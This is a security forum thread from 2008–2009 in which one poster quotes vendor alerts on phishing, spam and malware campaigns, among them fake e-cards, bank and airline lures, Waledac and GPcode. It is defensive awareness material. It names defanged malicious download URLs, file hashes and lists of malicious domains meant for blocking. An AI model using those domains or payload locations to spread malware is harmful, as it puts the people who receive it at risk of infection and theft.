September 11, 2008 at 04:42 pm - "US-CERT is aware that spam email messages are being sent that appear to come from high-level DHS officials, some of which attempt to entice the user into an advance fee fraud scam. In some cases, the sender's address has been spoofed so that the email appears to come from a legitimate dhs.gov address..."
:fear::mad:
AplusWebMaster
2008-09-15, 20:45
FYI...
Fake Postcards... Fake Hurricane Relief Web Site
- http://blog.trendmicro.com/fake-postcards-lead-to-fake-hurricane-relief-web-site/
Sep. 14, 2008 - "... The Hurricane Gustav connection is not really that apparent in the following spammed email message... It informs recipients that they received a postcard, and if they desire to view it, they should click any of the two links in the message body. Recipients who are lured into believing that some family member actually have sent them a postcard are redirected to the following Web page when they click either link... The nameless family member (one would immediately notice that this is so impersonal) who sent the postcard also wants the recipient to donate to Gustav victims. A well-crafted “postcard” and a chance to help people in need, how heartwarming! But only if there indeed was a legitimate card, and only if the money actually went to those affected by the hurricane. Even if the Web site says so, donations through this dubious channel do not go to Red Cross. The criminals behind this scam are the only ones who get to keep the money..."
(Screenshots available at the URL above.)
:fear: :mad:
AplusWebMaster
2008-09-17, 15:48
FYI...
UPS tracking invoice trojan...
- http://isc.sans.org/diary.html?storyid=5051
Last Updated: 2008-09-16 20:15:52 UTC - "We received two reports of fake UPS invoice tracking Trojan zip files. This is similar to other invoice Trojans we have seen... notice that while this appears to be a two way conversation it was really just the spammer who created the whole thing. The victim did -not- send UPS an email..."
(More detail at the URL above.)
- http://www.ups.com/content/us/en/about/news/service_updates/virus_us.html
:fear:
AplusWebMaster
2008-09-21, 18:22
FYI...
Fake Careerbuilder sites/phish...
- http://asert.arbornetworks.com/2008/09/busy-friday-careerbuilder-iran-and-burma/
September 19, 2008 - "...new fast flux phishing malcode delivery scheme targeting CareerBuilder. Lures bring you in to a number of sites and launch malcode onto your system. Pretty classic technique these days, been used heavily for banks in the past couple of weeks... It’s a fast flux botnet, apparently doing double flux too... Much of that list comes from Gary Warner’s always excellent blog*. So, as many of you may be in the job market, keep in mind that not everything from CareerBuilder is really from them..."
* http://garwarner.blogspot.com/2008/09/careerbuilder-latest-digital.html
(Screenshots available at both URLs above.)
:fear::mad:
AplusWebMaster
2008-09-23, 06:21
FYI...
Facebook "add friend" Malicious SPAM
- http://securitylabs.websense.com/content/Alerts/3185.aspx
09.22.2008 - "Websense... has discovered a new malicious social-engineering spam campaign masquerading as official emails sent by the popular Web 2.0 social-networking site, Facebook. The email is spoofed to appear from the domain facebookmail.com, an official domain used by Facebook for their outbound emails when notifying their users of an event. It is common for Facebook to send an email to notify their users when another Facebook user adds them as a friend on the social network. However, the spammers included a zip attachment that purports to contain a picture in order to entice the recipient to double-click on it. The attached file is actually a Trojan horse..."
(Screenshot avaliable at the URL above.)
:fear:
AplusWebMaster
2008-09-23, 17:48
FYI...
Wachovia... spy-phishing rootkit
- http://blog.trendmicro.com/wachovia-security-certificate-installs-rootkit/
Sep. 22, 2008 - "... spy-phishing scheme targeting the Fortune 500 company and 4th largest banking chain in the US, Wachovia Bank. This attack ends in the execution of a rootkit, TROJ_ROOTKIT.FX, which is a file that hides files and processes, allowing malicious attacks to run entirely beneath the radar.
Macalintal warns that he has seen the following subject headings used in this attack:
* Wachovia Connection Update Alert.
* Wachovia Connection Customer Support - Security Updates.
* Wachovia Connection upgrade warning.
* Wachovia Connection Emergency Alert System...
The malicious links download a file named SPlusWachoviadigicert.exe. Trend Micro Smart Protection Network detects this as TROJ_AGENT.AINZ. It accesses a certain URL to download another malware that in turn drops and installs TROJ_ROOTKIT.FX. This infection chain can be cut off at various points by the Smart Protection Network as we already detect the spam, the malicious links therein, and the files that are downloaded and executed on the system...
The legitimate Wachovia Security Plus link can be accessed here*, where the company discusses several security issues and precautionary methods to avoid being tricked by these types of attacks..."
* http://www.wachovia.com/securityplus/0,,,00.html
(Screenshot available at the TrendMicro URL above.)
:fear: :mad:
AplusWebMaster
2008-09-25, 06:33
FYI...
American Airlines phish...
- http://securitylabs.websense.com/content/Alerts/3187.aspx
09.23.2008 - "Websense... has discovered a new phishing campaign targeting American Airlines AAdvantage(R) Program customers. Users receive an email, which is spoofed, that tries to convince the user that, if they log in and fill out a 5-question survey, they will get a $50 reward. The email provides a link that takes visitors to the phishing Web site. The email also provides a fake code which is meant to entice the user even more..."
(Screenshot available at the URL above.)
:fear::mad:
AplusWebMaster
2008-09-26, 16:17
FYI...
World War 3 SPAM
- http://sunbeltblog.blogspot.com/2008/09/world-war-3-spam.html
September 25, 2008 - "This is particularly nasty spam pushing a fake codec trojan... If you go to that link, you get to a very convincing site pushing a fake codec. That CNNWorld was created yesterday, hosted in Iran..."
(Screenshots available at the URL above.)
:mad:
AplusWebMaster
2008-09-26, 21:40
FYI...
Bank fraud emails
- http://www.firstcybersecurity.com/main/news.asp#news1
25 September 2008 - "An increase in fraudulent activity is likely to follow the recent events in the banking sector... Customers with internet banking accounts are urged to take care if asked to respond to emails from banks which have been named as being involved in the recent takeovers and mergers. According to Director David Holman, “This is just the sort of confusion on which the fraudsters thrive. As these mergers and acquisitions continue in the banking sector, the consumer will expect to receive communications from their banks detailing name changes and giving them different websites to gain access to their internet bank accounts. Unless this is handled carefully it is a real opportunity for fraudsters to steal private information”. While many of us are wary of emails purporting to be from our banks, the latest APACs figures show that 18% of people who receive them still click through to links included in these (e)mails..."
- http://news.cnet.com/8301-1009_3-10051688-83.html
September 25, 2008
:fear:
AplusWebMaster
2008-09-30, 18:32
FYI...
Same WW3 SPAM... more detail
- http://blog.trendmicro.com/world-war-iii-malware-spam/
Sep. 29, 2008 - "...SPAM announcing the declaration of World War III. The link provided points to a legitimate-looking CNN page with a video. However, users wishing to view this video are prompted to install an ActiveX Object... The supposed ActiveX Object is actually malware, which Trend Micro detects as TSPY_BANCOS.JN. TSPY_BANCOS.JN, like all BANCOS variants, is an info stealer that monitors the browser of the affected system. It waits for the user to access certain banking-related Web sites, then spoofs the login pages of the bank Web site to steal sensitive account information. The request to install an ActiveX Object is a popular ploy to spread malware these days, and this bogus ActiveX Object is yet another one designed to deceive the user to believe that he’s installing something useful..."
(Screenshots available at the URL above.)
:fear:
AplusWebMaster
2008-10-01, 21:50
FYI...
- http://preview.tinyurl.com/4tksdr
Sep. 30, 2008 (TrendLabs) - "...recent report of -spammers- using a feature called ‘delivery receipt request’ to verify if a certain email address exists. Delivery receipts are messages sent to the original sender of an email message to verify that the sent message has been delivered to the intended recipient. While message delivery receipt acknowledgment is indeed available in popular desktop mail clients (such as Microsoft Outlook), and can be selectively ignored, most Web email platforms automatically send a delivery receipt when requested to do so if the targeted account exists. A Microsoft page stating instructions on how to enable & use this feature in various releases of Outlook can be seen here*. In enabling this function, spammers can now send spam to a large number of addresses and subsequently filter out the legitimate ones easily — that is, if the recipient chooses to selectively acknowledge each delivery request, or simply chooses to acknowledge all messages which have this request embedded. This unwillingly places a recipient on the spammer’s list of future victims just by acknowledging receipt of the initially sent spam. The delivery receipt function is ideally a useful feature especially for people who want to be absolutely sure that there message has been received. Unfortunately, this function, like so many other supposedly reputable functions, has been used for malicious intent instead..."
* http://support.microsoft.com/kb/192929
(In Outlook: >Tools >E-mail Options >Tracking Options - choose: "Never send a response")
:fear: :mad:
AplusWebMaster
2008-10-06, 18:01
FYI...
- http://blog.trendmicro.com/a-new-youtube-malware-tool/
Oct. 5, 2008 - "A new hacking tool circulating in the Internet now allows malicious users to create fake -YouTube- pages designed to deliver malware. The said tool, detected by Trend Micro as HKTL_FAKEYOUT, features a user-friendly console in Spanish that a hacker may use to create a pair of Web pages that look eerily identical to legitimate -YouTube- pages.
With a little crafty social engineering, unsuspecting users may be led into the first of the fake pages, INDEX.HTML. Here, users may be disappointed to see that they cannot view their video as they need a new version of Adobe Flash Player or some plugin or codec. A link is handily provided, and clicking the link leads users to the hacker’s file of choice, which could very possibly be something malicious. A second fake page informing users that the video they were trying to view cannot be shown is then displayed. This is to make users think that nothing’s really happened, when in fact by downloading the plugin, malware may already be running in their systems.
Fake codecs remain popular masks for malware. The popularity of -YouTube- also makes it a preferred target for malware users who want to infect more users... HKTL_FAKEYOUT could be very dangerous because it is very accessible to script kiddies who could use it for their malware and hacking operations. Users are advised to always check the URLs of pages they are viewing. Also, product updates should be downloaded from the vendors themselves to ensure that these are legitimate and not malicious."
Also see:
- http://voices.washingtonpost.com/securityfix/2008/09/fake_youtube_page_maker_helps.html
September 12, 2008
(Screenshots available at both URLs above.)
:fear: :mad:
AplusWebMaster
2008-10-13, 23:45
FYI...
Blogspot under push by malware authors
- http://sunbeltblog.blogspot.com/2008/10/blogspot-under-push-by-malware-authors.html
October 13, 2008 - "We’ve seen a number of new blogs on Blogspot today that push malware, pushing various search keywords...
Examples:
buzzwocdco. blogspot. com
iberianiceaande. blogspot. com
semtmbmshmenf. blogspot. com
These sites push fake codecs which generally make ones life quite miserable."
(Screenshot available at the URL above.)
:fear: :mad:
AplusWebMaster
2008-10-14, 19:49
FYI...
MSN Messenger used as lure in malicious SPAM
- http://securitylabs.websense.com/content/Alerts/3206.aspx
10.14.2008 - "Websense... has discovered a new malicious spam lure that uses the threat of a virus to encourage users to download a malicious Trojan. The email explains that by downloading the application linked within the email, users can protect themselves against a virus that spams messages to a user's contacts. The email offers an update to Live Messenger Plus - this is actually a Trojan (md5: 5F1D2521F6949F8B71B9FF93C17A8BE2). Antivirus detection rate is low... The URLs provided in the email redirect the user to a two-stage downloader named dsc.scr. As a distraction for the user, a dialog box is displayed explaining that the user will be redirected to msn.com.br. A browser then opens pointing to this site... A scheduled task is then created, and modifications are made to autoexec.bat to disable GBPlugin and other tools promoted by Brazilian banks to protect against such keyloggers and other malware..."
Hi5 "Add Friend" malicious SPAM
- http://securitylabs.websense.com/content/Alerts/3205.aspx
10.13.2008 - "Websense... has discovered a new malicious, visual social-engineering spam campaign masquerading as official emails sent by the popular Web 2.0 social-networking site Hi5. The email comes in Spanish language, and is -spoofed- to appear as if it comes from the domain hi5.com, an official domain used by Hi5 for their outbound emails when notifying their users of an event. It is common for Hi5 to send an email to notify their users when another Hi5 user adds them as a friend on the social network. However, the spammers embedded malicious links and a fake friend photograph in order to entice the recipient to click on them, which leads to a download of a Trojan horse (md5: 5f6b089f0048e6510c78bb38a3909b9c). The malicious application aims to steal confidential logins for a popular Mexican bank. A-V detection of this banker Trojan is low... A fake Hi5 friend request is included in the body of the email. We have previously alerted on a similar attack relating to Facebook "add friend" Malicious Spam. This clearly indicates that spammer and malware authors are increasingly targeting Web 2.0 sites to carry out their attacks..."
(Screenshots available at both URLs above.)
:fear::fear:
AplusWebMaster
2008-10-20, 23:08
FYI...
Bogus spammed email eTickets - Continental Airlines...
- http://blog.trendmicro.com/your-eticket-makes-a-worm-fly/
October 20, 2008 - "...Be careful when booking flights online or opening emails about your “online flight ticket”—or you could crash-land on a heap of malware trouble. TrendLabs researchers caught spammed email messages featuring bogus eTickets supposedly from Continental Airlines, the fourth-largest airline in the U.S. The message thanks the recipient for availing of a new service called “Buy flight ticket Online” and provides account details (even a password). Then it makes the recipient simply print out the attached “purchase invoice and plane ticket” before they use these, and they’re off! How convenient!... The attachment is named E-TICKET.ZIP, which in turn contains the file E-TICKET.DOC.EXE. “It’s the old double-extension trick to hopefully fool the user to double-click the attachment”... Trend Micro detects the file contained in the zipped attachment as WORM_AUTORUN.CTO. This worm propagates via removable drives and accesses websites to download other possibly malicious files. It also displays the icon of files related to Microsoft Word to avoid easy detection and consequent removal... The phrase "Your credit card has been charged" will just add more worry for the user, convincing him more to examine (read: double-click) the ‘flight details’... This seems to be a renewed campaign, as we first saw it in late August — only the featured airline then was Northwest Airlines, and the spam attachment led to rogue AV installation instead of a worm. Since then, the transaction fee has gone up; Northwest supposedly charged almost $700 while Continental about $915. And JetBlue Airways, it would seem, “charged” even more..."
(Screenshots available at the URL above.)
:mad:
AplusWebMaster
2008-10-23, 08:01
FYI...
Malicious BBB Certificate SPAM
- http://securitylabs.websense.com/content/Alerts/3213.aspx
10.22.2008 - "Websense... has discovered another round of malicious BBB spam today. The spam contains a spoofed -From- address to look as if the message was sent by the Better Business Bureau. The message uses social engineering tactics to entice readers to follow a link in the message in order to "register new software and update contact information". We have seen tens of thousands of these messages coming in since noon today. Also of note is that, from the format of these messages and the resulting links, this looks like it was done by the same group that has been spamming out malicious phishes targeting customers of Bank of America, Wachovia, Royal Bank, and others. Clicking on the link takes the victim to a page which -looks- like the BBB site. The site stresses that a digital certificate should be used while browsing the BBB site. It then provides a prompt to download a file called "TrustedBBBCertificate.exe" which is actually a Trojan Downloader (SHA-1 dcefc1fb912d7bb536de3e66d9c5c6c8465f0790). When this file is executed, it takes the victim to another Web page, which is hosted on another malicious domain, for the "Certificate Registration". This secondary site also tries to get the victim to download "TrustedBBBCertificate.exe"..."
(Screenshots available at the URL above.)
:fear::mad:
AplusWebMaster
2008-10-31, 23:31
FYI...
Malicious Website/Malicious Code - Halloween-themed websites
- http://securitylabs.websense.com/content/Alerts/3223.aspx
10.31.2008 - " Websense... has discovered that numerous Halloween-themed Web sites have been compromised as Halloween approaches and users are more likely to visit. One particular example is a Web site selling Halloween costumes. The deobfuscation returned by ThreatSeeker shows that the JavaScript has multiple layers of obfuscation. The script contacts a malcious server in the .biz TLD. Within the ThreatSeeker network, we have seen almost ten thousand sites infected with the same obfuscation technique. Another example is a US-based retailer using the Halloween theme to promote its products. This Web site is infected with a redirection that points to a gpack exploit kit. The ThreatSeeker network is currently tracking over thirteen-thousand sites infected with these patterns... Not only malware authors take advantage of seasonal events. Numerous recently registered proxy Web sites are using the Halloween theme to allow users to bypass traditional URL filtering solutions..."
(Screenshots available at the URL above.)
:fear:
AplusWebMaster
2008-11-05, 18:02
FYI...
Election result SPAM malware
- http://securitylabs.websense.com/content/Alerts/3229.aspx
11.05.2008 - "Websense... has discovered that malware authors are capitalizing on the recently announced results of the 2008 US Presidential election. Malicious email lures are being sent promising a video showing an interview with the advisors to the recently elected US President. The email actually contains links to a file called 'BarackObama.exe' hosted on a compromised travel site at hxxp://*snip*.com/web/BarackObama.exe. This file is a Trojan Downloader with MD5 9720d70a5da9ca442ecf41e9269f5a27. Upon execution files called system.exe and firewall.exe are dropped into the system directory. A phishing kit is unpacked locally, and the dropped files are bound to startup. The hosts file is also modified. Major anti-virus vendors* are not detecting this Trojan Horse..."
(Screenshots available at the URL above.)
* http://www.virustotal.com/analisis/f080362c4fa67d5c69b58053a00bc4e2
11.05.2008 19:58:04 (CET) - Result: 14/36 (38.89%)
Per: http://voices.washingtonpost.com/securityfix/2008/11/malware_piggybacks_on_obama_wi.html
:fear:
AplusWebMaster
2008-11-05, 21:15
Same (kind of) stuff, same day...
Election result SPAM malware #2
- http://securitylabs.websense.com/content/Alerts/3230.aspx
11.05.2008 - "... further activity from malware authors using the news of the U.S. Presidential campaign outcome as bait to attract users into executing malicious executables. So far we have over 25,000 emails through our systems... In a very quick response to the outcome of the U.S. Presidential attacks we have now seen both localized and globalized attacks... Clicking on the link leads the user to a purposely registered domain which advises the user that they need to install the latest version of Adobe Flash player before the video can be viewed. The malicious Web site actually links to a file called 'adobe_flash.exe' with MD5 47C86509A78DC1EDB42F2964BEA86306. This is a Trojan Downloader packed with ASPack. Upon execution, a RootKit is installed on the compromised machine, and data is sent to multiple command and control servers..."
Also see:
- http://garwarner.blogspot.com/2008/11/computer-virus-masquerades-as-obama.html
November 05, 2008
- http://www.f-secure.com/weblog/archives/00001530.html
November 5, 2008
- http://sunbeltblog.blogspot.com/2008/11/blizzard-of-us-presidential-malware.html
11.05.2008
(Screenshots available at all URLs above.)
:fear::mad:
AplusWebMaster
2008-11-08, 00:31
FYI...
- http://securitylabs.websense.com/content/Alerts/3233.aspx
11.07.2008 - "Websense... has discovered that the Koobface social networking worm is again spreading on Facebook... email reveals that infected user accounts are being used to post messages to Facebook friends lists. The content was an enticing message with a link that used a Facebook open redirector. When recipients click the link, they are automatically redirected multiple times, finally reaching a site masquerading as YouTube that serves a malicious Trojan downloader..."
(Screenshots available at the URL above.)
:fear::fear:
AplusWebMaster
2008-11-10, 14:10
FYI...
SPAM from ‘US Treasury’ ...redirects to malicious sites
- http://blog.trendmicro.com/us-treasury-warns-of-phishing-redirects-to-malicious-sites/
November 9, 2008 | 11:52 pm - "Spammed email messages -supposedly- from The United States Federal Reserve Bank warn their recipients of a “large-scaled phishing attack” affecting several banks and credit unions... The email message gives details on the supposed phishing attack and adds that the US Tresury Department has also monitored a high level of illegal wire transfers. Having told recipients that, the email message then informs them of restrictions imposed on federal wire transfers as part of security measures being taken by concerned government agencies. The message helpfully gives some links where users can get more detailed information. But instead of being directed to a legitimate website, those who click are led to .org domains with names completely different from the websites of the Federal Reserve Bank, the Treasury Department, or the Federal Deposit Insurance Corporation... Other related attacks that use the names of legitimate government organizations or mask themselves as security measures include the following:
* ‘Treasury Optimizer’ Updates Systems With Malware
* Storm Goes Economic
* Fake IRS Web Sites Found (Again)
Users are advised to refrain from clicking links in unsolicited email messages. It is best to go directly to the website of the concerned organization for more information..."
(Screenshot available at the URL above.)
:fear::mad:
AplusWebMaster
2008-11-13, 22:08
FYI...
SPAM - huge drops with McColo demise...
- http://marshal.com/trace/traceitem.asp?article=815
November 13, 2008 - "Yesterday, MCColo Corp, the company responsible for hosting the control servers for several of the biggest spam botnets was taken offline*. Srizbi, Rustock, Mega-D and Pushdo botnets, as well as several others, all had control servers hosted on McColo’s network. Last week these four botnets accounted for over 80 percent of all spam. In addition to botnet control servers, McColo was also known to host malicious software, fake antivirus and child pornography websites... Today, spam has significantly decreased and three of the major botnets, Mega-D, Srizbi and Rustock have almost completely stopped sending spam. Our daily spam volume index showed a massive drop over the last two days... We do not expect this drop in spam to continue for long; often the people or groups responsible for the malicious activity simply move to a new host and continue as normal. Nevertheless, such a dramatic decline in spam, however short-lived, is good news indeed and represents another blow for the cyber criminals."
* http://asert.arbornetworks.com/2008/11/third-bad-isp-dissolves-mccolo-gone/
November 12, 2008
> http://hostexploit.com/downloads/Hostexploit%20Cyber%20Crime%20USA%20v%202.0%201108.pdf
- http://blog.trendmicro.com/spam-volume-plummets-as-isps-pull-the-plug-on-mccolo/
Nov. 15, 2008 - "...This small victory will most likely be short-lived, as it is almost certain that these obviously profitable criminal operations are too valuable for these criminal operations to be abandoned..."
:fear:
AplusWebMaster
2008-11-20, 05:52
FYI...
- http://blog.trendmicro.com/paypal-spam-warns-of-fraud-installs-worm-instead/
Nov. 18, 2008 - "A new fake PayPal email message is being spammed — this time, it is not the typical PayPal phishing email that everyone is accustomed to. Instead of including links asking for the recipient’s personal information, this spammed message asks users to open a .ZIP attachment... It informs recipients that their PayPal accounts were hacked, and that some fraudulent activity may have occurred. As part of security measures, “PayPal” is asking users to review the “report” in the .ZIP file and then contact the company if anything unusual is discovered. The attachment that arrives with this spam, however, does not contain a report or any similar information. Inside the .ZIP archive is a worm that infects the recipient’s computer upon execution..."
(Screenshots available at the URL above.)
:fear::mad:
AplusWebMaster
2008-11-26, 20:38
FYI...
- http://securitylabs.websense.com/content/Blogs/3245.aspx
11.26.2008 - "As we wish our American colleagues and friends 'Happy Thanksgiving', we could be tempted to get into the spirit and maybe brighten up our desktop with screensavers, wallpapers and the like. Our advice to users is to exercise caution - such activity may lead to adware, BHOs, and other undesirables... We found examples of Thanksgiving-themed screensavers leading to Potentially Unwanted Software (PUS) in the form of browser toolbars (BHO), as well as changes to your home page, and personal data being harvested... no such thing as a free lunch, even on Thanksgiving..."
(Screenshots available at the URL above.)
:fear: :mad:
AplusWebMaster
2008-11-28, 14:28
FYI...
- http://asert.arbornetworks.com/2008/11/this-bofa-demo-thing-got-big-fast/
November 27, 2008 - "The Obama spam and malcode gang is back at it with a new fast flux phishing and malcode ruse. This time it’s a demo from the Bank of America that requires the classic “Flash Upgrade”. At the peak I was seeing 400 unique URLs for this run an hour. The URLs were unique strings, possibly for tracking purposes or possibly to stress URL blacklists. But, when you look more closely you see they are just a handful of domain names. This is a lot like the Rock Phish of old. The malcode download routine is very typical. If you don’t follow the lure, a meta-refresh will get ya... The malcode is tiny, but downloads hxxp ://silviocash .com/usp.exe, aka Paparus or Urlsnif. Driver file, rootkitted, and now the box will send info from IE (ie form data) to the hacker. Owned..."
* http://garwarner.blogspot.com/2008/11/bank-of-america-demo-account-do-not.html
(Screenshots available at both URLs above.)
:fear::mad:
AplusWebMaster
2008-11-29, 20:22
FYI... :santa:
- http://securitylabs.websense.com/content/Alerts/3248.aspx
11.27.2008 - "Websense... has discovered that malware authors are already using Christmas themes this year as a social engineering tactic, in an effort to gain control over compromised machines. This campaign uses email messages in the form of e-greetings, leading to supposed animated postcards. These actually lead to a Trojan backdoor that has been distributed in previous malicious spam campaigns. The email messages, spoofed to appear as though they have been sent from postcards.org, display an animated Christmas scene. A URL link within the email leads to a malicious file called postcard.exe hosted on various servers, including those in the .com TLD space. Once executed, a backdoor is created by the malware author enabling access and control over the resources of the compromised machine. Control is conducted over IRC, communicating with ircserver.*snip*.la. During the install process an image called xmas.jpg is displayed to the user as a distraction technique..."
(Screenshot available at the URL above.)
:fear::mad:
AplusWebMaster
2008-11-30, 14:35
FYI... more holiday SCAMS...
- http://blog.trendmicro.com/getting-a-taste-of-mcdonalds-phish-fillet/
Nov. 29, 2008 - "Phishers always think out of the box, thinking of ways to fool victims into falling for their phishing schemes. Now... we’ve found a new twist - one that involves the popular fast-food chain McDonald’s. The phishing page displays a fake Member Satisfaction Survey, and for the customer to take the bait, it promises $75 credit to the customer’s account..."
- http://blog.trendmicro.com/new-gpcode-trojan-holds-victims-files-hostage/
Nov. 28, 2008 - "...Just recently... a new version of the GPcode ransomware has surfaced... It drops several files which are also detected as TROJ_RANDSOM.A. After which, it searches and encrypts files found on any readable and writable drive on the system, rendering them inaccessible (without the encryption key). It also changes the file name of the encrypted files, by adding the .XNC extension. It also drops the file READ THIS.TXT in each folder that contains an encrypted file. This file informs the victim that the files have been encrypted, and that a decrypting tool must be purchased to decrypt the files. Email addresses are also included in the text file, which the victim must contact to obtain the decryption tool. Accordingly, the perpetrator of this crime demands £200 (US$307) for the decryption services... Users are strongly advised to back up their files so as not to be victimized by ransomware."
(Screenshots available at both URLs above.)
:fear::mad:
AplusWebMaster
2008-12-03, 04:30
FYI...
McDonald's and Coca-Cola - malicious holiday Coupons and Promotions
- http://securitylabs.websense.com/content/Alerts/3250.aspx
12.02.2008 - "Websense... has discovered another infectious holiday email making the rounds. Victims are receiving messages promoting a coupon from McDonald's or a holiday promotion from the Coca-Cola company. Both messages include a .zip attachment that contains either coupon.exe or promotion.exe. The malicious files (SHA1 ca973b0e458f0e0cca13636bd88784b80ccae24d) are Trojan Droppers, but have low anti-virus detection at the moment. The McDonald's email claims to present their latest discount menu, and states that the attached coupon should be printed. The Coca-Cola email states that the attachment has details about their new online game and a chance to win Coca-Cola drinks for life..."
(Screenshots available at the URL above.)
(More Screenshots):
- http://blog.trendmicro.com/bogus-mcdonalds-coca-cola-promos-used-as-worm-carriers/
:fear::fear:
AplusWebMaster
2008-12-08, 20:27
FYI...
- http://securitylabs.websense.com/content/Alerts/3252.aspx
12.08.2008 - "The fraudulent email message references a real Microsoft Security Advisory 951306 (also known as CVE-2008-1436). The email provides instructions in both French and English. When the email's malicious attachment (MSC003-WIN.scr) is run, it connects via IRC to a BOT Controller, [removed]dns .be. This connection is not through the default port, but through port 81. The application binds to startup, ensuring it will be run automatically when the computer is restarted (as instructed in the email). The SHA1 of MSC003-WIN.scr is 2056c9fa1b97fca775cc7a01768fb39818963a94. Major antivirus vendors are -not- detecting the malicious attachment."
(Screenshot available at the URL above.)
:fear: :mad:
AplusWebMaster
2008-12-19, 18:33
FYI...
IE 7 exploit... attacks using Doc files
- http://preview.tinyurl.com/5wfx74
December 17, 2008 - (AvertLabs.com) - "... Malware authors have been coming up with innovative mechanisms to leverage this exploit to social engineer the not so tech-savvy internet users. One of the most prominent and unique techniques adopted by the malware authors involves a Microsoft word document being sent out [SPAM] to an unsuspecting user. Upon opening the word document the embedded ActiveX control... is instantiated and executed... The control then makes a request to the webpage hosting the IE 7 exploit. The charm with this approach is that the exploit is downloaded and run without the knowledge or permission of the user. To the unsuspecting user it will just appear as yet another normal Doc file..."
:fear:
AplusWebMaster
2008-12-22, 19:51
FYI...
Another holiday, another e-card run - Waledec
- http://asert.arbornetworks.com/2008/12/another-holiday-another-e-card-run-waledec/
December 21, 2008 - "But this time it’s not Storm, nor does it even seem at all like Storm. This one is dubbed Waldec. Infection strategy: entice email users to come to the website and get a greeting card. No graphics, but it will entice you anyhow. “Daniel just mailed to you an Online greeting card.” Thanks, Daniel!
Subject lines I’ve seen in our spamtraps:
• Merry Christmas greetings for you
• You have received an eCard
The website you go to says, “Merry Christmas”, and “If you don’t see your greeting card, just click here to download it.”. Here comes /ecard.exe, as always, via a meta-refresh. No HTTP browser exploits on the site. This is hosted on a fast flux network... The ecard.exe binary is pretty much malcode, as you would expect... Pretty weak detection when we look via VirusTotal*. Two vendors dubbed it Waledec...
• Microsoft 1.4205 2008.12.20 Trojan:Win32/Waledac.A
• NOD32 3709 2008.12.20 a variant of Win32/Waledac ..."
* http://www.virustotal.com/analisis/a0cc84fb1efa809c068a029cbc1e27f5
:fear:
AplusWebMaster
2008-12-26, 16:30
FYI...
Christmas e-card malware...
- http://isc.sans.org/diary.html?storyid=5557
Last Updated: 2008-12-26 03:12:19 UTC ...(Version: 2) - "... over the last (few) days there has been an increase in malicious Christmas cards distributing the Waledac worm. The e-mails consist of a hyperlink to a "Christmas card"... The user will need to click on either button, get a Security Warning and will need to accept the fact that an executable is being run... Some of the domains that were reported to us by readers (thanks Mike and the Shadowserver foundation) include:
bestchristmascard .com
blackchristmascard .com
cheapdecember .com
christmaslightsnow .com
decemberchristmas .com
directchristmasgift .com
freechristmassite .com
freechristmasworld .com
freedecember .com
funnychristmasguide .com
holidayxmas .com
itsfatherchristmas .com
justchristmasgift .com
livechristmascard .com
livechristmasgift .com
superchristmasday .com
superchristmaslights .com
whitewhitechristmas .com
yourchristmaslights .com
yourdecember .com
Note that this list is still very much incomplete. We may post updates.
For now, we recommend:
• Blocking the download of 'ecard.exe', or the affiliated domains on your corporate proxy;
• Ensure that your anti virus and anti spam solutions are updated frequently as the AV vendors build coverage for this new threat. Given the mass mailing nature, spam protection is likely to be the first to pick up on this...
Arbor Networks has an interesting blog entry* up on the flux tactics involved with this threat here. For further data on the worm itself, visit Symantec's writeup**."
(Screenshot available at the ISC url above.)
* http://asert.arbornetworks.com/2008/12/another-holiday-another-e-card-run-waledec/
** http://www.symantec.com/norton/security_response/writeup.jsp?docid=2008-122308-1429-99&tabid=2
- http://blog.trendmicro.com/merry-malware-greetings-flooding-inboxes/
Dec. 26, 2008
:fear::fear::fear:
AplusWebMaster
2009-01-01, 18:01
FYI...
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081231
31 December 2008 - "...A new trojan, which has been called a Waledac variant, appeared in recent weeks hyping up Christmas e-cards with nice inviting e-mails leading you to cute website that you can get your e-card at... Lately the website has been peddling either "ecard.exe" or "postcard.exe" for download. But the fun does not end there. There's a nice little JavaScript reference pointing to "google-analysis.js" which has some nasty excitement embedded into it. The JavaScript currently loads a page from the domain "seocom .mobi" which in turns attempts to exploit the user and install a trojan which gets its commands from the same site. It is ultimately instructed to download and install the same Waledac trojan.
Fast-flux Domains
These e-mail lures have involved several different domains of which all are part of a fast flux network... The best option is to block the domains. The following is a list of all of the domains known to Shadowserver to be associated with the Waledac trojan: ...( see the Shadowserver URL above for the list of domains ) ...the trojan is fairly loud and starts beaconing right away to seeded hosts... we suspect the network is using some form of strong encryption for this communication...
Storm Worm?
Right! You are not the only one thinking this. In fact a lot of people are drawing similar comparisons. There are a ton of differences, but there's also a bunch of similarities for sure. Here's a few similarities we along with our fellow collaborators/security researchers have come up with:
• Fast-flux Network (domains are fast fluxing and name servers frequently change IPs)
• Several Name Servers per Domain (ns[1-6].<waledac.domain>)
• Use of Nginx (sure lots of people use it, but hey it's a similarity)
• Spreading through e-mail and Holiday Themes
• Use of "ecard.exe" and "postcard.exe" (both previously used by Storm)
• Drive-by Exploit in Domains (Storm previously used Neosploit) ...
Prevention and Detection
The first step as always is -not- click the links from your e-mail. This will keep you relatively safe and Waledac free... Your next step is to block the above listed domains. There will surely be new ones added to the mix in the future, but blocking this will definitely help in the near term. Antivirus being up to date can't hurt either..."
:fear:
AplusWebMaster
2009-01-06, 02:44
FYI...
Twitter-Facebook Phishing...
- http://isc.sans.org/diary.html?storyid=5623
Last Updated: 2009-01-04 15:45:09 UTC - "Several readers have sent us information about a phishing attempt based on Twitter and possibly Facebook. It looks like the twitter folks have it well under control*, but as always with your Internet experience, vigilance and skepticism are your friends..."
* http://blog.twitter.com/2009/01/gone-phishing.html
January 03, 2009
- http://preview.tinyurl.com/73gm9n
01/05/2009 cgisecurity.net - ""Days after a wave of phishing attacks fooled thousands of Twitter users, it appears that another security hole has been found by...someone... The Fox tweet was deleted an hour after it was posted, so the password may not have been changed... This can't be good for Twitter. It will be good for the people calling for more secure, standards based authentication on Twitter and elsewhere around the web."
- readwrite web
From Twitter's blog: http://blog.twitter.com/2009/01/monday-morning-madness.html
"...The issue with these 33 accounts is different from the Phishing scam aimed at Twitter users this weekend. These accounts were compromised by an individual who hacked into some of the tools our support team uses to help people do things like edit the email address associated with their Twitter account when they can't remember or get stuck. We considered this a very serious breach of security and immediately took the support tools offline. We'll put them back only when they're safe and secure"..."
- http://blog.trendmicro.com/so-is-it-twitter-or-facebook/
Jan. 5, 2009
:fear:
AplusWebMaster
2009-01-06, 17:38
FYI...
HMRC phishing email and website
- http://securitylabs.websense.com/content/Alerts/3276.aspx
